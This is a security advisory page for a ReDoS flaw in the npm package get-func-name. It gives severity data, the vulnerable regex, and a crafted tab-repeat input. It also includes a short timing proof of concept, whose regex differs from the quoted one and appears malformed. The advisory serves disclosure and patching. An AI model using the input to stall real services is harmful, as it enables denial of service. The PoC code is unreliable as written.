GHSA-4q6p-r6v2-jvc5

Suggest an improvement
Source
https://github.com/advisories/GHSA-4q6p-r6v2-jvc5
Import Source
https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/09/GHSA-4q6p-r6v2-jvc5/GHSA-4q6p-r6v2-jvc5.json
JSON Data
https://api.osv.dev/v1/vulns/GHSA-4q6p-r6v2-jvc5
Aliases
Published
2023-09-27T20:16:00Z
Modified
2023-11-08T04:13:31.847974Z
Severity
  • 7.5 (High) CVSS_V3 - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H CVSS Calculator
Summary
Chaijs/get-func-name vulnerable to ReDoS
Details

The current regex implementation for parsing values in the module is susceptible to excessive backtracking, leading to potential DoS attacks. The regex implementation in question is as follows:

const functionNameMatch = /\s*function(?:\s|\s*\/\*[^(?:*/)]+\*\/\s*)*([^\s(/]+)/;

This vulnerability can be exploited when there is an imbalance in parentheses, which results in excessive backtracking and subsequently increases the CPU load and processing time significantly. This vulnerability can be triggered using the following input:

'\t'.repeat(54773) + '\t/function/i'

Here is a simple PoC code to demonstrate the issue:

const protocolre = /\sfunction(?:\s|\s/*[^(?:*\/)]+*/\s*)*([^\(\/]+)/;

const startTime = Date.now();
const maliciousInput = '\t'.repeat(54773) + '\t/function/i'

protocolre.test(maliciousInput);

const endTime = Date.now();

console.log("process time: ", endTime - startTime, "ms");
Database specific 
{
    "nvd_published_at": "2023-09-27T15:19:34Z",
    "cwe_ids": [
        "CWE-1333",
        "CWE-400"
    ],
    "severity": "HIGH",
    "github_reviewed": true,
    "github_reviewed_at": "2023-09-27T20:16:00Z"
}
References

Affected packages

npm / get-func-name

Package

Name
get-func-name
View open source insights on deps.dev
Purl
pkg:npm/get-func-name

Affected ranges

Type
SEMVER
Events
Introduced
0Unknown introduced version / All previous versions are affected
Fixed
2.0.1